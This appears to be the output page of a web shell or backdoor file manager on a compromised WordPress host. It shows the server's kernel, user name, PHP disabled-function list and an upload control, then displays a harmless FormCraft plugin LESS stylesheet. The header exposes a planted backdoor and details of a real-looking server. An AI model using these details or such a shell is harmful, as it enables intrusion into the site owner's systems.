WS_OK_7.4.33 HEX
HEX
Server: nginx/1.21.4
System: Linux v12674 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: endtheignorance (1014)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v12674/lcamaryland/public_html/wp-content/plugins/formcraft3/src/less/less-variables.less
@gridPadding: 32px;
@fontColor: #456;
@themeColor: #6495ed;
@borderRadius: 4px;
@backgroundGreyOne: rgba(248,250,252,1);
@backgroundGreyTwo: rgba(243,245,247,1);
@borderColor: #e7e8e9;
@borderColorDarkOne: #e1e2e3;
@boxShadow: 0 0 0 0.5px rgba(0,20,40,.11), 0 2px 8px 0 rgba(50,55,90,.2);
@boxShadowDarkOne: 0 0 0 0.5px rgba(0,10,20,.12), 0 2px 12px 0 rgba(0,10,20,.25);
@red: #e86464;
@green: #47b181;

.formcraft-icon-mixin {
	font-family: 'Material Icons';
	font-weight: normal;
	font-style: normal;
	font-size: 110%;
	display: inline-block;
	line-height: 1;
	text-transform: none;
	letter-spacing: normal;
	word-wrap: normal;
	white-space: nowrap;
	direction: ltr;
	vertical-align: text-bottom;
	-webkit-font-smoothing: antialiased;
	text-rendering: optimizeLegibility;
	-moz-osx-font-smoothing: grayscale;
	font-feature-settings: 'liga';
}
.smoothing {
	-webkit-font-smoothing: antialiased;
	text-rendering: optimizeLegibility;
	-moz-osx-font-smoothing: grayscale;	
}
.noSmoothing {
	-webkit-font-smoothing: initial;
	text-rendering: optimizeLegibility;
	-moz-osx-font-smoothing: initial;	
}